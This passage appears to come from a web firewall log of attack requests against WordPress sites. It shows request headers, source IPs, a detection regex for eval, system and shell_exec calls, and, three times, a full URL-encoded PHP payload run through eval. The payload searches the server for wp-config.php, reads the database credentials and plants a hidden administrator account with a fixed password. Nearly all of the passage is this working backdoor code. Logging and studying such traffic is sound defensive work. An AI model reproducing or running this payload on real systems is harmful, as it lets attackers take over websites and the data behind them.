%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/sodium_compat\/src\/Core\/Base64\/security.php HTTP\/1.1\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\ncontent-length:12663\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-fetch-site:none\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google Chrome\";v=\"99\"\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-mode:navigate\nsec-ch-ua-mobile:?0\nsec-fetch-dest:document\nsec-ch-ua-platform:\"Windows\"\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.51 Safari\/537.36\nhost:dewenlabels.com\nsec-fetch-user:?1\n\nbRjtVo=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 18:05:13","213.209.159.254","POST","\/wp-includes\/class-wp-term.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.0 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> CmArqm:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/class-wp-term.php HTTP\/1.1\naccept:*\/*\naccept-encoding:gzip,deflate\nsec-fetch-site:none\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-mode:navigate\ncontent-length:12663\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-fetch-dest:document\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.0 Safari\/605.1.15\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\n\nCmArqm=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2